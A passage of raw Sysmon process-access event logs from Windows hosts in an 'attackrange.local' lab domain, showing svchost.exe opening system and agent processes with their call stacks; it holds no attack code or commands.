Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292441Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D13E-6086-9D00-00000000BB01}1728C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292440Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292439Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D13C-6086-8E00-00000000BB01}3436C:\Windows\System32\msdtc.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292438Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C5-6086-3C00-00000000BB01}1592C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292437Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C4-6086-3200-00000000BB01}2924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292436Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-2700-00000000BB01}2720C:\Windows\system32\wbem\unsecapp.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292435Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292434Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1D00-00000000BB01}1976C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292433Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1C00-00000000BB01}1940C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292432Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1B00-00000000BB01}1932C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292431Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1900-00000000BB01}1844C:\Windows\System32\spoolsv.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292430Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1800-00000000BB01}1716C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292429Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1700-00000000BB01}1348C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292428Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1600-00000000BB01}1168C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292427Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292426Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1400-00000000BB01}368C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292425Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1300-00000000BB01}344C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292424Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1200-00000000BB01}92C:\Windows\system32\dwm.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292423Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292422Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292421Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292420Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0E00-00000000BB01}920C:\Windows\system32\LogonUI.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292419Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0D00-00000000BB01}792C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292418Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292417Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0900-00000000BB01}572C:\Windows\system32\winlogon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440789Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.428{42DC5269-CE99-6086-1500-00000000BA01}12001256C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440788Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.428{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440787Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.428{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440786Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.428{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440785Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.428{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440784Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.428{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440783Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.428{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440782Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.428{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440781Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 